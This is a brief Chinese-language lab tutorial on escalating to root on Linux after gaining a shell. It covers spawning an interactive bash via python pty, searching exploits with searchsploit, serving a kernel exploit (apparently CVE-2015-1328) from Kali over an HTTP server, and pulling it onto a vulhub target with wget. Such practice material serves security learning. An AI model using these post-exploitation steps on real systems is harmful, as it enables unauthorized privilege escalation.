在我们使用cve或者其他方式获取shell 后
python -c 'import pty;pty.spawn("/bin/bash")'
获取一个交互式的bash shell
使用id 命令可以查看当前的用户权限
查看当前的linux 系统版本
利用kali自带的漏洞检索库检索漏洞
searchsploit privilege | grep -i linux | grep -i kernel | grep 5
使用find 或者locate 获取文件路径,locate 初次使用可能没有任何显示,需要使用updatedb更新数据
进行exp 代码下载
启动http服务时,使用的是win11 +kali + ubuntu,ubuntu 启动vulhub ,kali启动http服务,
由于使用wsl2 的配置未使用vmware ,在localhost 可以看到对应的文件
这个是cp 拷贝到home 目录下的但是使用wget http://localhost无法下载
使用ifconfig kali 查看ip方配置 如果没有ifconfig 使用如下命令:
apt install net-tools
PS(备用:使用打开防火墙端口)可能不需要打开
iptables -A INPUT -p tcp -i docker0 --dport 8160 -j ACCEPT
ubuntu kali的地址ip 地址使用wget 对kernel cve 提权文件漏洞文件.c进行下载
在exp 的路径下使用python启用web 服务
python3 -m http.server 8160
使用wget 进行下载exp
目标机中缺少动态库需要安装gcc 内核提权
参考博客:
c(184条消息) Linux提权第一篇-Linux内核漏洞提权(以CVE-2015-1328为例)_OceanSec的博客-CSDN博客_linux内核提权